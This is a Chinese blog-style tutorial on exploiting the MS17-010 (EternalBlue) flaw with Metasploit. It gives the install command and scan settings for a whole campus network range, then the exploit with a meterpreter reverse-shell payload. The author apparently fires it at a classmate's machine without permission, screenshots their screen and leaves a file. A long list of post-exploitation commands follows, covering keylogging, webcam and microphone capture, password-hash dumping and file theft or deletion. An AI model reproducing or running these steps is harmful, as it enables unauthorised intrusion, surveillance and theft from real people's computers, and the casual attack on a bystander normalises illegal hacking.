MSF利用ms17_010实验

ubuntu尝试ms17010漏洞的实验

该漏洞具有非常大的危害性，这个漏洞导致攻击者在目标系统上可以执行任意代，包括格式化电脑删除重要的内容。
当然漏洞非常的古老了，防范只需要打个补丁，再不济关闭445端口。

安装

首先打开终端输入
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
安装成功就能指令msfconsole来使用了

使用

MSF功能不止有利用ms17010，所以我们要选择对应的模块，其中利用到
auxiliary/scanner/smb/smb_ms17_010扫描工具模块
exploit/windows/smb/ms17_010_eternalblue利用工具模块

由于我实现环境是在校园网环境中，所以也就对校园网进行网段的扫描，我进入是我们的校园无线网络，连接不需要获得认证上网功能就可以实现漏洞攻击。

首先是查看自己IP

再利用扫描工具来对网段任何的B段进行扫描

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 10.120.*.*
set threads 512
exploit

扫出结果10.120.65.230IP存在漏洞风险，使用工具进行攻击

use exploit/windows/smb/ms17_010_eternalblue
set rhost 10.120.65.230
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.120.79.122
set lport 4567
exploit

其中rhost为目标主机ip，lhost为自身监听ip

显示攻击成功了，这个时候，已经可以对被攻击者为所欲为了
打中后可以输入help来查看能执行的操作

用户操作：Stdapi: User interface Commands（用户接口命令）

enumdesktops    -->列出所有可访问的桌面和窗口站（窗体列表）
getdesktop      -->得到当前的Meterpreter桌面

idletime        -->返回秒远程用户已经闲置数量

keyscan_dump    -->转储按键缓冲（下载键盘记录）
keyscan_start   -->开始捕获击键（开始键盘记录）
keyscan_stop    -->停止捕获击键（停止键盘记录）
screenshot      -->抓取交互式桌面截图（当前操作界面截图一张）
setdesktop      -->改变meterpreters当前桌面

uictl           -->控制一些用户界面组件（获取键盘、鼠标控制权）
使用uictl -h 查看帮助（打开/关闭，键盘/鼠标）

PS：键盘记录注意点，先开始，后下载，再结束，否则会出错


摄像头：Stdapi: Webcam Commands（摄像头命令）

record_mic       -->X秒从默认的麦克风record_mic音频记录（音频录制）

webcam_chat      -->开始视频聊天（视频，对方会有弹窗）

webcam_list      -->单摄像头（查看摄像头列表）
webcam_snap      -->采取快照从指定的摄像头（摄像头拍摄一张照片）

webcam_stream    -->播放视频流从指定的摄像头（开启摄像头监控）


其他命令操作

getsystem        -->获取高权限
 
hashdump         -->获取当前用户hash

screenshot来进行截图屏幕
发现在打游戏，偷偷的不要打扰到别人哦，上传一个txt提示他存在漏洞需要修复打补丁了呢，实验成功，点到为止哦。

tips：漏洞对于windows7以外的机器打中概率非常低，如果没有被打中，请不要再进行二次攻击，大概率会导致被攻击用户蓝屏。
借鉴链接一
借鉴链接二
借鉴链接三

2.文件系统命令
cat c:\boot.ini#查看文件内容,文件必须存在
del c:\boot.ini #删除指定的文件
upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机主上，如upload  setup.exe C:\\windows\\system32\
download nimeia.txt /root/Desktop/   # 下载文件到本机上如：download C:\\boot.ini /root/或者download C:\\"ProgramFiles"\\Tencent\\QQ\\Users\\295******125\\Msg2.0.db /root/
edit c:\boot.ini  # 编辑文件
getlwd#打印本地目录
getwd#打印工作目录
lcd#更改本地目录
ls#列出在当前目录中的文件列表
lpwd#打印本地目录
pwd#输出工作目录
cd c:\\ #进入目录文件下
rm file #删除文件
mkdir dier #在受害者系统上的创建目录
rmdir#受害者系统上删除目录
dir#列出目标主机的文件和文件夹信息
mv#修改目标主机上的文件名
search -d d:\\www -f web.config #search 文件，如search  -d c:\\  -f*.doc
meterpreter > search -f autoexec.bat  #搜索文件
meterpreter > search -f sea*.bat c:\\xamp\\
enumdesktops     #用户登录数

1)下载文件
使用命令“download +file path”,将下载目标机器的相对应权限的任何路径下的文件
(2)上传文件
“upload”命令为上传文件到我们的目标机器，在图中我们上传了ll.txt到目标机器的c:\pp\下。
(3)查看文件
“cat filename”在当前目录下查看文件内容，输入命令后便会返回给我们所查看文件的内容。
(4)切换、查询当前路径
“pwd”命令将查询当前在dos命令下的路径，“cd”命令可以改变当前路径，如下图中cd ..为切换到当前路径下的上一目录。